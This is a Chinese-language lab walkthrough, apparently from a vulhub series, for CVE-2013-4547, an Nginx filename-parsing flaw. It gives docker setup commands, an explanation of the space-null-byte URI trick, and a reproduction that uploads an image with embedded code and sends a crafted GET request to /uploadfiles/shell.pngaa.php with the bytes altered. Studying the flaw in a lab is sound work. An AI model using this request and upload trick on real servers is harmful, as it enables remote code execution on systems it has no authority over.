CVE-2013-4547

CVE-2013-4547

  • 一、环境搭建
  • 二、漏洞原理
  • 三、漏洞复现


一、环境搭建

如下介绍kali搭建的教程

cd ~/vulhub/nginx/CVE-2013-4547  // 进入指定环境
docker-compose build     // 进行环境编译
docker-compose up -d     // 启动环境

docker-compose ps使用这条命令查看当前正在运行的环境,如下所示:

在这里插入图片描述
环境启动后,访问http://your-ip:8080/即可看到一个上传页面。

二、漏洞原理

这个漏洞其实和代码执行没有太大关系,其主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。Nginx匹配到.php结尾的请求,就发送给fastcgi进行解析,常见的写法如下:

location ~ \.php$ {
    include        fastcgi_params;

    fastcgi_pass   127.0.0.1:9000;
    fastcgi_index  index.php;
    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;
    fastcgi_param  DOCUMENT_ROOT /var/www/html;
}

正常情况下(关闭pathinfo的情况下),只有.php后缀的文件才会被发送给fastcgi解析。而存在CVE-2013-4547的情况下,我们请求1.gif[0x20][0x00].php,这个URI可以匹配上正则.php$,可以进入这个Location块;但进入后,Nginx却错误地认为请求的文件是1.gif[0x20],就设置其为SCRIPT_FILENAME的值发送给fastcgi。

fastcgi根据SCRIPT_FILENAME的值进行解析,最后造成了解析漏洞。

三、漏洞复现

  1. 访问http://your-ip:8080/,界面如下所示:(一个文件上传界面)
    CVE-2013-4547_第1张图片

  2. 上传一个图片文件,其中带有恶义代码,如下所示:
    CVE-2013-4547_第2张图片

CVE-2013-4547_第3张图片

  1. 访问该文件并抓包
GET /uploadfiles/shell.pngaa.php HTTP/1.1
Host: 你的IP:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

把aa改为20,00,并换掉IP再发送:
CVE-2013-4547_第4张图片

  1. 使用`docker-compose stop停掉环境
    在这里插入图片描述

你可能感兴趣的:(vulhub,web安全,服务器)